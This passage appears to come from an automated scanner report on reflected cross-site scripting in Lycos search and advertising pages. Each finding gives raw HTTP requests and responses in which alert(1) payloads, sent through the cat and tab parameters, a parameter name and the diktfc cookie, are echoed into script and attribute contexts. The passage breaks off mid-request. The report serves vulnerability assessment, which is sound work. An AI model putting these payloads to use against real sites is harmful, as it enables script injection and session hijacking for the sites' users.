HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multiaaf1c"><script>alert(1)</script>be82f60f06e&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.137. http://search.lycos.com/video/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50828"%3balert(1)//3e5bc5531b2 was submitted in the cat parameter. This input was echoed as 50828";alert(1)//3e5bc5531b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/?tab=multi&cat=video50828"%3balert(1)//3e5bc5531b2 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_video50828";alert(1)//3e5bc5531b2";
//-->
...[SNIP]...

3.138. http://search.lycos.com/video/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de7a"><script>alert(1)</script>0aa4e76c954 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?tab=multi&cat=video7de7a"><script>alert(1)</script>0aa4e76c954 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_video7de7a"><script>alert(1)</script>0aa4e76c954&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.139. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baf1"><script>alert(1)</script>9c23e31d9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?2baf1"><script>alert(1)</script>9c23e31d9b9=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?2baf1"><script>alert(1)</script>9c23e31d9b9=1&mobile=1">
...[SNIP]...

3.140. http://search.lycos.com/video/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae732"><script>alert(1)</script>fc2ad86c0a was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/?tab=multiae732"><script>alert(1)</script>fc2ad86c0a&cat=video HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multiae732"><script>alert(1)</script>fc2ad86c0a&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.141. http://advertising.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f38a"%3balert(1)//20a4f660a78 was submitted in the diktfc cookie. This input was echoed as 2f38a";alert(1)//20a4f660a78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f38a"%3balert(1)//20a4f660a78; PENTA=174.121.222.18.1292163892141045

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f38a";alert(1)//20a4f660a78.lycos.com"
});
</script>
...[SNIP]...

3.142. http://advertising.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7045"><script>alert(1)</script>e23721f874e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e; PENTA=174.121.222.18.1292163892141045

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7045"><script>alert(1)</script>e23721f874e.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

3.143. http://advertising.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8531"%3balert(1)//6adf9a53388 was submitted in the diktfc cookie. This input was echoed as d8531";alert(1)//6adf9a53388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad8531"%3balert(1)//6adf9a53388; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad8531";alert(1)//6adf9a53388.lycos.com"
});
</script>
...[SNIP]...

3.144. http://advertising.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ebb"><script>alert(1)</script>473ae392abf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86ebb"><script>alert(1)</script>473ae392abf.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

3.145. http://advertising.lycos.com/contactus.html [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /contactus.html

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b5d"%3balert(1)//fbdd08a21ac was submitted in the diktfc cookie. This input was echoed as 73b5d";alert(1)//fbdd08a21ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactus.html HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A73b5d"%3balert(1)//fbdd08a21ac; PENTA=174.121.222.18.1292163890688109

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A73b5d";alert(1)//fbdd08a21ac.lycos.com"
});
</script>
...[SNIP]...

3.146. http://advertising.lycos.com/contactus.html [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /contactus.html

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f719d"><script>alert(1)</script>1c833ec0851 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contactus.html HTTP/1.1
Host: advertising.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851; PENTA=174.121.222.18.1292163890688109

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:26:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=advertising.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af719d"><script>alert(1)</script>1c833ec0851.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

3.147. http://advertising.lycos.com/lycos.xml [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /lycos.xml

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad8cc"%3balert(1)//75d1be7661c was submitted in the diktfc cookie. This input was echoed as ad8cc";alert(1)//75d1be7661c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lycos.xml HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad8cc"%3balert(1)//75d1be7661c; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"advertising.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad8cc";alert(1)//75d1be7661c.lycos.com"
});
</script>
...[SNIP]...

3.148. http://advertising.lycos.com/lycos.xml [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /lycos.xml

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532cd"><script>alert(1)</script>325056d76aa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /lycos.xml HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
